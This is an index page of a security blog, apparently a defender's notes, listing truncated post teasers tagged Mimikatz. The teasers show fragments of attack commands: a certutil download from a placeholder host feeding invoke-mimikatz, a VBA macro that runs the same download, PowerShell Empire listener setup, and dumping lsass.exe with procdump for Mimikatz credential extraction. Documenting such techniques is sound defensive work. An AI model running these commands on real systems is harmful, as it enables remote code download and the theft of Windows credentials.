neonprimetime security , just trying to help
Showing posts with label
Mimikatz
.
Show all posts
Showing posts with label
Mimikatz
.
Show all posts
Thursday, January 13, 2022
downloader certutil powershell invoke-mimikatz
›
sample downloader that executed mimikatz certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt'; $B64 = get-content t...
3 comments:
VBA Macro downloader invoke-mimikatz
›
Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""") Shell ("powershell.exe...
4 comments:
Friday, February 14, 2020
Powershell Empire common path
›
Powershell Empire common path in a lab test environment ./empire 1.) setup a listener listeners userlistener http execute 2.) creat...
1 comment:
Wednesday, October 2, 2019
Lsass Dump Mimikatz Pass the Hash Basics
›
procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp Mimikatz.exe # sekurlsa::minidump lsass.dmp # sekurlsa::logonPasswor...
When you can & cannot Pass the Hash
›
great blog https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html From a...
›
Home
View web version